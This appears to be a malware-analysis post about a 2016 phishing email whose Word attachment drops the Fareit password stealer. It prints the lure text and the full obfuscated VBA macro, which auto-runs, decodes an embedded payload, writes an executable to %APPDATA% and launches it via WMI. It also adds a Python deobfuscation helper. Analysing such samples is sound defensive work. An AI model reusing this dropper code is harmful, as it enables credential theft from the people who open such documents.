The following email was received by a client (email domain redacted to “<DOMAIN>”), with an attachment named “<DOMAIN>_contract.doc”:
From: jiazw@neusoft.com [mailto:jiazw@neusoft.com]
Sent: Wednesday, July 13, 2016 9:29 AM
To: <EMPLOYEE NAME>
Subject: Re: <DOMAIN> contract
I have attached our contract.
Please check it and let me know if you want to add any changes.
Thank you
Jiazhi Williams
Neusoft America Inc.
P: 408.0146124
F: 408.8865348
As expected, this one is yet another Word macro that looks like this:
This document is protected
1 Open the document in Microsoft Office. Previewing online is not available for protected documents.
2 If this document was downloaded from your email, please click “Enable Editing” from the yellow bar above.
3 Once you have enabled editing, please click “Enable Content” from the yellow bar above.
This one was yet again obfuscated VBScript that I didn’t feel like cleaning up (code included below). According to Windows Defender, a file was created that was flagged as “PWS:Win32/Fareit”.
The following error occurred: Error code 0x80508023. The program could not find the malware and other potentially unwanted software on this computer.
Category: Password Stealer
Description: This program is dangerous and captures user passwords.
Recommended action: Remove this software immediately.
Items:
file:C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\3IDCVV6R\pm[1].dll
Get more information about this item online.
Forms – Leptinotarsa
Private Sub UserForm_Scroll(ByVal ActionX As MSForms.fmScrollAction, ByVal ActionY As MSForms.fmScrollAction, ByVal RequestDx As Single, ByVal RequestDy As Single, ByVal ActualDx As MSForms.ReturnSingle, ByVal ActualDy As MSForms.ReturnSingle)
    epistle = dyspeptic.epicure
    conveyance = Sqr(epistle)
    conveyance = Round(conveyance)
    Do While conveyance <> 50
        dyspeptic.alosa
        conveyance = conveyance + 1
    Loop
End Sub
Microsoft Word Objects – ThisDocument
Sub pegs(undrained)
    Dim kwakiutl As Variant
    Dim damusque As Variant
    Dim phiz As Variant
    alectura = alectura / 89
    eyes = Lcase("Bl") & Mid("sottishennysubornation", 8, 4)
    Close #undrained
    novus = Right("chironomidaenonc", 4) + Mid("concordanceompliaascendant", 12, 6) + "nce"
End Sub

Sub CommentsCollectionObject()
    Dim MyText As String
    Dim MyRange As Object
    Set MyRange = ActiveDocument.Range
    MyText = "<Replace this with your text>"
    ' Selection Example:
    Selection.Comments.Add Range:=Selection.Range, Text:=MyText
    ' Range Example:
    MyRange.Comments.Add Range:=Selection.Range, Text:=MyText
End Sub

Sub PrintAll()
    Dim aDoc As Document
    For Each aDoc In Documents
        aDoc.PrintOut
    Next
End Sub

Function permitted(coloratura) As String
    Dim blazing(63) As Long
    Dim archangel() As Byte
    Dim moll As Integer
    novus = StrReverse("ef") + "nder"
    Dim ireland(255) As Byte
    bureaucrat = bureaucrat Xor 430
    Dim coelogyne As Long
    Dim genip As String
    Dim consecrated As Long
    Dim calculation As Long
    Dim freeforall(63) As Long
    Dim barbarity(63) As Long
    Dim fasciculated() As Byte
    Dim paretic As Long
    boom = 4032
    balkiness = 16711680
    earner = 65536
    abolitionist = 65280
    soigne = 262144
    situated = 37 + 58 - 75 + 258028
    acted = 16515072
    astronaut = 18 - 42 - 44 + 4164
    andean = 85 - 102 + 80
    darlingtonia = 64
    hang = 66 + 189
    pipile = 23 + 233
    Dim meaningful As String
    Dim cleaner() As Byte
    cleaner = StrConv(coloratura, vbFromUnicode)
    Dim heartgrief As Variant
    For Click = 0 To UBound(cleaner)
        cleaner(Click) = cleaner(Click) + 2 Xor 11
    Next Click
    riskfree = 72 + 105 - 170
    Select Case riskfree
        Case 1 To 10
            khana = StrReverse("omo") & Left("phagiuncoordinated", 5) & Left("cparoles", 1)
            effectuate = "la" & Ucase("Te")
            flash = bitterroot
        Case 11
            anestrus = anestrus - 294
        Case 13
            hegoat = Right("klanma", 2) & Mid("cumulationttrecoadjuvant", 11, 4)
            curio = Left("aminchirology", 4) & Lcase("OACIDUria")
            hearken = palish
    End Select
    bronchocele = StrConv(cleaner, vbUnicode)
    moll = 2
    buccinidae = 122
    For consecrated = 0 To 255
        Select Case consecrated
            Case 65 To 90
                ireland(consecrated) = consecrated - 65
            Case 97 To buccinidae
                ireland(consecrated) = consecrated - 71
            Case 48 To 57
                ireland(consecrated) = consecrated + 89 - 32 + 57 - 110
            Case 43
                ireland(consecrated) = 62
            Case 47
                ireland(consecrated) = 63
        End Select
    Next consecrated
    For consecrated = 0 To 63
        freeforall(consecrated) = consecrated * darlingtonia
        barbarity(consecrated) = consecrated * astronaut
        blazing(consecrated) = consecrated * soigne
    Next consecrated
    fasciculated = StrConv(bronchocele, vbFromUnicode)
    anteroom = 73 - 69
    ReDim archangel((((UBound(fasciculated) + 1) \ anteroom) * 3) - 1)
    For paretic = 0 To UBound(fasciculated) Step 4
        chelate = fasciculated(paretic)
        bufo = 3
        calculation = blazing(ireland(chelate)) + barbarity(ireland(fasciculated(paretic + 1))) + _
            freeforall(ireland(fasciculated(paretic + 2))) + ireland(fasciculated(paretic + bufo))
        consecrated = calculation And balkiness
        archangel(coelogyne) = consecrated \ earner
        consecrated = calculation And abolitionist
        archangel(coelogyne + 1) = consecrated \ pipile
        archangel(coelogyne + 2) = calculation And hang
        coelogyne = coelogyne + 3
    Next paretic
    genip = StrConv(archangel, vbUnicode)
    If moll Then genip = Left$(genip, Len(genip) - moll)
    permitted = genip
End Function

Public Sub AutoOpen()
    Dim blessed As String
    Dim astonishing As Variant
    anestrus = anestrus \ 244
    Dim whack As Integer
    Dim god As Long
    whack = 19 Mod (3)
    phosphoprotein = "mestizo"
    If whack < 46 - 72 - 384 Then
        alectura = alectura * 1
        CommentsCollectionObject
    Else
        Dim quickening As Variant
        leptinotarsa.Scroll fmScrollActionNoChange, fmScrollActionEnd
        microfiche = 69
        tetanus = 75
        If microfiche + tetanus < 14 Then
            microfiche = Left("hypsimultaneously", 3) & "ervent" & Mid("waiterilationhippophagy", 7, 7)
            dekko = Right("cholineev", 2) + Mid("sarsaparillaanascdevon", 13, 5) + Right("distingueence", 4)
        Else
            tetanus = 94
        End If
    End If
End Sub
Modules – Dyspeptic
Dim anestrus
Dim bureaucrat As Long
Dim catalatic
Dim alectura As Long
Dim phosphoprotein As String
Dim novus

Sub ToggleTextBoundaries()
    If Documents.Count > 0 Then
        With ActiveDocument.ActiveWindow.View
            .ShowTextBoundaries = Not .ShowTextBoundaries
        End With
    End If
End Sub

Function elision(below)
    Dim austereness As Long
    Dim kiosk As String
    Dim chemiluminescence As String
    winteraceae = StrConv(below, 109 + 4 + 15)
    despumate = pretext
    badv = mousy
    elision = winteraceae
End Function

Sub appropriate(westerly, tonsure)
    Dim acculturational As String
    Dim cassocked As String
    bureaucrat = bureaucrat * 1
    Open westerly For Binary Access Read Write As #tonsure
    novus = StrReverse("inam") & Mid("onesleffestationaminomethane", 8, 9)
End Sub

Sub chastened(emporium, georgette, dementat)
    Dim consumable As Integer
    Dim minefield() As Byte
    Dim refero As Integer
    minefield = elision(emporium)
    codon = biplane
    mbabane = dementat
    Put #mbabane, , minefield
End Sub

Function messily(doggerel)
    agranulocytic = 45 + 19
    Select Case agranulocytic
        Case 64 To 71
            anestrus = anestrus - 85
            days = Ucase("wi") + Right("andromedanmgmt", 5) + "s:\\"
            phosphoprotein = Lcase("IN") & Right("pantyhosesola", 4) & Left("tiondefaced", 4)
            deputies = StrReverse("or\.") + Lcase("OT\cImV2")
        Case 34 To 37
            Dim reductive As Variant
            novus = "ste" + Ucase("RcorAR") + Ucase("iUs")
            anestrus = anestrus * 3
    End Select
    phosphoprotein = Left("grsouthernness", 2) & Ucase("umbl") & Mid("elecampaneepeacekeeper", 11, 1)
    Set illustrative = GetObject(days + deputies)
    peine = Ucase("WiN") + Right("berry32_Process", 10)
    Set enured = illustrative.Get(peine)
    Set adit = enured.Methods_
    bureaucrat = bureaucrat Mod 315
    implicational = Ucase("cR") + Ucase("Eate")
    novus = Mid("margarinapforwards", 9, 2) & StrReverse("vorp") & StrReverse("la")
    computer = 12 - 89 + 129
    Select Case computer
        Case 17 To 23
            Dim kidnapping As String
            catalatic = "pop"
            phosphoprotein = Ucase("INT") + Lcase("ENtioN") + Mid("tramperallymultangular", 8, 4)
        Case 52 To 57
            anestrus = anestrus / 322
            Set minikin = adit(implicational).InParameters.Spawninstance_
            novus = Right("conscriptiondr", 2) & "iven"
            minikin.CommandLine = doggerel
    End Select
    bun = tan(50)
    If bun <> 51 Then
        illustrative.ExecMethod peine, implicational, minikin
    Else
        phosphoprotein = "cardroom"
    End If
End Function

Sub SortText()
    ' A macro to sort the selected text, if the user has selected
    ' more than one paragraph
    If Documents.Count > 0 Then
        ' The user has at least one document open.
        If Selection.Paragraphs.Count > 1 Then
            ' The user has selected more than one paragraph
            ' of text, so sort it.
            Selection.Sort
        Else
            ' Tell the user what to do.
            MsgBox "Please select two or more paragraphs and try again."
        End If
    End If
End Sub

Function epicure()
    Dim silurus As Long
    Dim casing As String
    closegrained = 54 + 123 + 100 + 9723
    anestrus = anestrus + 168
    catalatic = Lcase("cOB") & Right("carburetoraltit", 5) & Mid("crenulateeaddlepated", 10, 1)
    Dim brainpan As String
    burked = 96 - 29 + 120 - 87
    alectura = alectura Mod 401
    Dim capuchin As Integer
    usurious = DDB(closegrained, burked, 5, 2)
    alectura = alectura And 285
    epicure = usurious
End Function

Sub alosa()
    anestrus = anestrus / 329
    enchant = "misdemeanor"
    Dim deciduous As String
    bureaucrat = bureaucrat Xor 450
    slovenry = 63
    Select Case slovenry
        Case 63 To 81
            alectura = alectura / 233
            Dim bereft As String
            deciduous = extravaganza
            Dim spellbound As Integer
        Case 23 To 28
            Dim amends As Integer
            alectura = alectura + 450
            bureaucrat = bureaucrat + 347
        Case 15 To 17
            Dim paragrapher As Long
            bureaucrat = bureaucrat - 484
            anestrus = anestrus And 391
    End Select
    collegian = tan(79)
    If collegian <> 52 Then
        bereft = deciduous + Mid("tiger\dconnu", 6, 2) + Ucase("yBBu") + Mid("entandrophragmak.exeagreeableness", 16, 5)
        fearless = "ex" & Lcase("ORAB") & Right("delegatele", 2)
    Else
        alectura = alectura + 468
    End If
    prottagonist = tan(73)
    If prottagonist <> 71 Then
        curcuitous = FreeFile
        catalatic = "sanctus"
        slade = 33 + 2 - 102 + 67
    Else
        bureaucrat = bureaucrat And 158
    End If
    anestrus = anestrus + 261
    eyot = slade
    appropriate bereft, curcuitous
    passions = leptinotarsa.endocrinology
    phosphoprotein = "purchaser"
    taxicoach = passions
    bureaucrat = bureaucrat + 55
    attenuated = ThisDocument.permitted(taxicoach)
    inveterate = StrReverse("lb") + "eed"
    bellyband = gulfweed
    dictate = holloa
    mobcap = 119 + 11 - 53
    Select Case mobcap
        Case 77 To 81
            catalatic = "selfluminous"
            communication = Len(attenuated)
            Dim electrolyze As Long
            anestrus = anestrus + 171
        Case 37 To 43
            Dim aryan As Byte
            novus = "sesqui"
            anestrus = anestrus * 1
    End Select
    phosphoprotein = Right("patriarchyre", 2) + Ucase("tren") + Ucase("Ch")
    anestrus = anestrus \ 98
    abridger = 7 + 16 + 49 - 14
    Select Case abridger
        Case 58 To 67
            bureaucrat = bureaucrat - 135
            dyspeptic.chastened attenuated, eyot, curcuitous
            novus = "billboard"
        Case 36 To 41
            Dim shoreless As Long
            novus = "archidiskidon"
            catalatic = Ucase("PR") & Lcase("OwEs") & Ucase("S")
        Case 20 To 24
            Dim attitudinize As Byte
            alectura = alectura * 1
            phosphoprotein = Mid("desmidaecuneiform", 7, 2) & Mid("ognirostaticmaser", 5, 8)
    End Select
    acaulescent = 17 - 13 + 68
    Select Case acaulescent
        Case 72 To 79
            anestrus = anestrus / 357
            novus = Lcase("co") & "bble" & Mid("unattestedrnormalness", 11, 1)
            center = curcuitous
            ThisDocument.pegs center
        Case 24 To 25
            Dim nutbrown As Integer
            catalatic = "bi" + Left("bliopoledolichocephalic", 8)
            alectura = alectura Xor 205
        Case 27 To 30
            Dim daredevil As Variant
            bureaucrat = bureaucrat \ 65
            catalatic = Lcase("eD") & Mid("potteryucataerology", 8, 4) & "e"
    End Select
    phosphoprotein = Mid("notabilityabdoteleprompter", 11, 4) & StrReverse("csonim") & StrReverse("ypo")
    dissuaded = tan(68)
    If dissuaded <> 51 Then
        phosphoprotein = Ucase("CL") + StrReverse("rogna")
        messily bereft
    Else
        anestrus = anestrus - 282
    End If
End Sub

Function extravaganza()
    Dim debased As String
    Dim bonze As Variant
    mezereum = Ucase("aP") + "pDat" + Right("circumfusea", 1)
    anestrus = anestrus And 499
    Dim danaea As Byte
    aplysia = Environ(mezereum)
    alectura = alectura Mod 101
    temperize = Left("noncosmolatry", 3) & StrReverse("ahtel") & Left("lgaum", 1)
    extravaganza = aplysia
    phosphoprotein = Mid("scadssuassimilation", 6, 2) + Left("bspapluralistic", 4) + Mid("unguiculatecefulfill", 12, 2)
End Function
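Most of the obfuscation in these modules is string splicing: Mid/Left/Right/StrReverse/Ucase/Lcase calls over literal junk words. The Python below is an added triage example, not part of the original post or of the macro, that folds such literal-only assignments back into plain strings; the names `eval_chain` and `recover_strings` are hypothetical, and it assumes string literals contain no doubled-quote escapes.

```python
import re

# VBA string built-ins this macro uses to hide its strings (Mid is 1-based).
FUNCS = {
    "mid": lambda s, i, n=None: s[i - 1:] if n is None else s[i - 1:i - 1 + n],
    "left": lambda s, n: s[:n],
    "right": lambda s, n: s[-n:] if n else "",
    "strreverse": lambda s: s[::-1],
    "ucase": str.upper,
    "lcase": str.lower,
}
# One term: Func("literal"[, int...]) or a bare "literal" (assumes no "" escapes).
TERM = r'(?:(\w+)\(\s*"([^"]*)"((?:\s*,\s*\d+)*)\s*\)|"([^"]*)")'
TERM_NC = r'(?:\w+\(\s*"[^"]*"(?:\s*,\s*\d+)*\s*\)|"[^"]*")'
ASSIGN = re.compile(rf'(\w+)\s*=\s*({TERM_NC}(?:\s*[&+]\s*{TERM_NC})*)')

def eval_chain(expr):
    """Fold a literal-only concatenation; None if it calls an unknown function."""
    parts = []
    for name, arg, nums, lit in re.findall(TERM, expr):
        if not name:
            parts.append(lit)
            continue
        fn = FUNCS.get(name.lower())
        if fn is None:
            return None
        try:
            parts.append(fn(arg, *map(int, re.findall(r"\d+", nums))))
        except TypeError:  # wrong argument count for this built-in
            return None
    return "".join(parts)

def recover_strings(source):
    """Return (variable, folded string) for every foldable assignment, in order."""
    pairs = ((var, eval_chain(expr)) for var, expr in ASSIGN.findall(source))
    return [(var, val) for var, val in pairs if val is not None]

# Statements copied from the macro on this page, one per line.
SAMPLE = r'''
days = Ucase("wi") + Right("andromedanmgmt", 5) + "s:\\"
deputies = StrReverse("or\.") + Lcase("OT\cImV2")
peine = Ucase("WiN") + Right("berry32_Process", 10)
implicational = Ucase("cR") + Ucase("Eate")
mezereum = Ucase("aP") + "pDat" + Right("circumfusea", 1)
novus = StrReverse("ef") + "nder"
'''

if __name__ == "__main__":
    for var, value in recover_strings(SAMPLE):
        print(f"{var:14} {value}")
```

Assignments that mix variables into the expression (such as `bereft = deciduous + ...`) are skipped rather than guessed at. Decoy variables fold to ordinary dictionary words, which helps separate them from the strings the macro actually passes to `GetObject`, `Environ` and the WMI calls.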